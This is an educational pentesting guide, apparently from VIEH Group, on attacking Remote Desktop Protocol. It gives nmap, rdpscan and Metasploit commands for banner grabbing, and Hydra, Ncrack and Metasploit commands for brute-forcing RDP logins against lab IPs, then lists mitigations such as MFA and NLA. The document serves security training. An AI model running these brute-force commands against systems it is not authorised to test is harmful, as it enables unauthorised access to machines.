A Document series by VIEH Group

RDP Pentesting
A Comprehensive Overview
 Disclaimer

Dear readers,
This document is provided by VIEH Group for educational purposes only.
While we strive for accuracy and reliability, we make no warranties or
representations regarding the completeness, accuracy, or usefulness of the
information presented herein. Any reliance you place on this document is at
your own risk. VIEH Group shall not be liable for any damages arising from
the use of or reliance on this document. We acknowledge and appreciate the
contribution of the source person.

also,
This document is not created by a professional content writer so any mistake
and error is a part of great design

Happy learning !!!

This document is fully credited to Unknown, whose exceptional insights

elevate its value. Their contribution is deeply appreciated, underscoring their
significant role in its creation.

Our newsletter: Cyber Arjun

Scan QR:

Social Media: @viehgroup viehgroup.com support@viehgroup.com

Research Report: RDP Penetration Testing - A
Comprehensive Overview

Table of Contents

1. Introduction to Remote Desktop Protocol

2. Techniques for Banner Grabbing in RDP
o What is Banner Grabbing?
o Methods for Banner Grabbing on RDP Services
 Using `nmap’
 Using `rdp-scan
 Using Metasploit

3. Methods for Brute-Force and Password Cracking in RDP

o Overview of Brute-Force Attacks
o Common Brute-Force Tools for RDP
 Hydra
 Ncrack
 Metasploit Auxiliary Module

4. Practical Exercise: Penetration Testing on Windows Server VM

o Banner Grabbing on RDP Server
o Brute Force Attack on RDP Login

5. Conclusion and Mitigation Recommendations

o Key Findings
o Mitigation Strategies

6. References

Social Media: @viehgroup viehgroup.com support@viehgroup.com

1. Introduction to Remote Desktop Protocol (RDP)

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which

enables users to remotely connect to another computer. It provides the full graphical interface
of the host system, allowing interaction with applications and files just as if the user were
physically present at the machine.
RDP is widely used in IT environments for remote management of systems and remote
troubleshooting. It operates primarily on **TCP port 3389** but can also use **UDP** for
more efficient data transmission in some cases. The protocol supports various features such as
encryption, clipboard sharing, and device redirection. However, its widespread use has also
made it a frequent target for attacks.

COMMON RDP SECURITY RISKS:

o Weak password policies leading to brute-force attacks.

o Exposed RDP endpoints to the public internet.
o Vulnerabilities in the protocol, like the infamous BlueKeep (CVE-2019-0708) exploit.
o Lack of multi-factor authentication (MFA)
o Man-in-the-Middle (MitM) attacks when weak encryption methods are used.

2. Techniques for Banner Grabbing in RDP

What is Banner Grabbing?

Banner grabbing is a form of active reconnaissance where an attacker probes a service to

discover critical information such as the software version, service type, and possible
vulnerabilities. In the context of RDP, attackers can use this technique to identify specific
versions of the RDP service and OS type, which can assist in launching targeted attacks.
Methods for Banner Grabbing on RDP Services
1. Using `nmap` for Banner Grabbing

Nmap is a powerful network scanning tool commonly used for service detection and version
identification. Here’s how you can perform RDP banner grabbing using `nmap`:

nmap -sV -p 3389 <target-IP>

 -sV: Enables version detection.

 -p 3389: Specifies the RDP port (3389).

Social Media: @viehgroup viehgroup.com support@viehgroup.com

Example Output:

3389/tcp open ms-wbt-server Microsoft Terminal Service

This output confirms that the RDP service (Microsoft Terminal Service) is running on the target.

2. Using `rdp-scan`:

`rdp-scan` is a tool specifically designed for identifying RDP servers. It performs banner
grabbing and determines if the server is vulnerable to specific exploits.

rdpscan <target-IP>

This command gives you more detailed information about the RDP version, encryption
methods, and whether it's susceptible to common RDP vulnerabilities (e.g., BlueKeep).

3. Banner Grabbing with Metasploit:

The Metasploit Framework provides modules for scanning and gathering information on
various services, including RDP:
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <target-IP>
run
This Metasploit module checks if the RDP service is accessible and grabs detailed information
such as the protocol version.

Metasploit Example Output:

[+] 192.168.1.100:3389 - RDP Service detected

[+] 192.168.1.100:3389 - Supported Protocols: RDP Security, SSL,
CredSSP

Social Media: @viehgroup viehgroup.com support@viehgroup.com

3. Methods for Brute-Force and Password Cracking in
RDP
Overview of Brute-Force Attacks

Brute-force attacks on RDP involve systematically guessing login credentials until a valid
username and password combination is found. Because RDP is often exposed to the internet,
attackers frequently attempt to exploit weak or common passwords using this technique. RDP
brute-force attacks can lead to complete system compromise, allowing attackers to gain
unauthorized control over a machine.

Common Brute-Force Tools for RDP

1. HYDRA
Hydra is a widely-used brute-force tool that supports RDP among other protocols. To perform a
brute-force attack on RDP using Hydra, you need a list of potential usernames and passwords.

hydra -L userlist.txt -P passlist.txt rdp://<target-IP>

 -L userlist.txt: The file containing possible usernames.

 -P passlist.txt: The file containing possible passwords.

Example Command:
hydra -L usernames.txt -P passwords.txt rdp://192.168.1.100

Hydra will attempt to log in to the RDP service by trying combinations from the provided
username and password lists.

2. NCRACK:
Ncrack is another robust network authentication cracking tool, optimized for speed. It’s
designed to crack RDP credentials efficiently:

ncrack -p 3389 -U userlist.txt -P passlist.txt <target-IP>

Social Media: @viehgroup viehgroup.com support@viehgroup.com

  -p 3389: The RDP port.
 -U userlist.txt: A list of usernames.
 -P passlist.txt: A list of passwords.

Example Command:
ncrack -p 3389 -U users.txt -P passwords.txt 192.168.1.100

3. METASPLOIT AUXILIARY MODULE:

Metasploit provides a dedicated module to brute-force RDP credentials:

use auxiliary/scanner/rdp/rdp_login set RHOSTS <target-IP> set

USER_FILE userlist.txt set PASS_FILE passlist.txt run

This module will iterate through the provided usernames and passwords, attempting to log in
via RDP.

Example Command:
use auxiliary/scanner/rdp/rdp_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Metasploit will report any successful logins.

Social Media: @viehgroup viehgroup.com support@viehgroup.com

4. Practical Exercise: Penetration Testing on Windows Server
VM (RDP Service)
Exercise Overview

In this practical exercise, we will:

1. Perform banner grabbing on a Windows Server running an RDP service.
2. Execute a brute-force attack on the RDP login interface.

4.1. Banner Grabbing on RDP Server

Target IP Address: Assume the target machine’s IP is `192.168.1.30`.

To check whether the RDP port is up
nmap 192.168.1.30 –p 3389

Social Media: @viehgroup viehgroup.com support@viehgroup.com

1. Banner Grabbing using Nmap:
Run the following command:
nmap -sV -p 3389 192.168.1.30

The output shows that the RDP service is running and identified as "Microsoft Terminal
Service".

2. Metasploit Banner Grabbing:

Use Metasploit to gather more details about the RDP service:
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 192.168.1.30
run

Social Media: @viehgroup viehgroup.com support@viehgroup.com

4.2. Brute Force Attack on RDP Login

Hydra Brute Force Attack:

Using Hydra to brute force the RDP login with a sample list of usernames and passwords:
hydra -L users.txt -P passwords.txt rdp://192.168.1.30
hydra –L user.txt –P password_list.txt rdp://192.168.1.30

5. Conclusion and Mitigation Recommendations

Key Findings
o Banner Grabbing: Successfully identified the RDP service running on the target machine.
Tools like Nmap, RDPScan, and Metasploit effectively revealed service details.
o Brute-Force Attack: Tools like Hydra, Ncrack, and Metasploit demonstrated how weak
or common credentials could be cracked to gain unauthorized access to the RDP server.

Mitigation Strategies:
o Enable Multi-Factor Authentication (MFA) for RDP logins to make it significantly harder
for attackers to compromise accounts.
o Enforce Strong Password Policies: Use complex, unique passwords and enforce regular
password changes.
o Restrict RDP Access: Use firewalls to allow RDP access only from trusted IP addresses, or
configure a VPN.
o Enable Network Level Authentication (NLA): This adds an extra layer of security by
requiring the user to authenticate before establishing an RDP session.

Social Media: @viehgroup viehgroup.com support@viehgroup.com

o Monitor RDP Activity: Enable logging and monitor for suspicious login attempts or
unusual access patterns.
o Regularly Patch RDP Vulnerabilities: Apply security updates to protect against known
RDP exploits such as BlueKeep.

Social Media: @viehgroup viehgroup.com support@viehgroup.com

References

1. [Microsoft RDP Security Best Practices](https://docs.microsoft.com/en-us/windows-

server/remote/remote-desktop-services)
2. [Nmap Official Guide](https://nmap.org/book/man.html)
3. [Hydra Documentation](https://github.com/vanhauser-thc/thc-hydra)

Social Media: @viehgroup viehgroup.com support@viehgroup.com

Thanks for checking out, A lot of love
from VIEH Group

Jai hind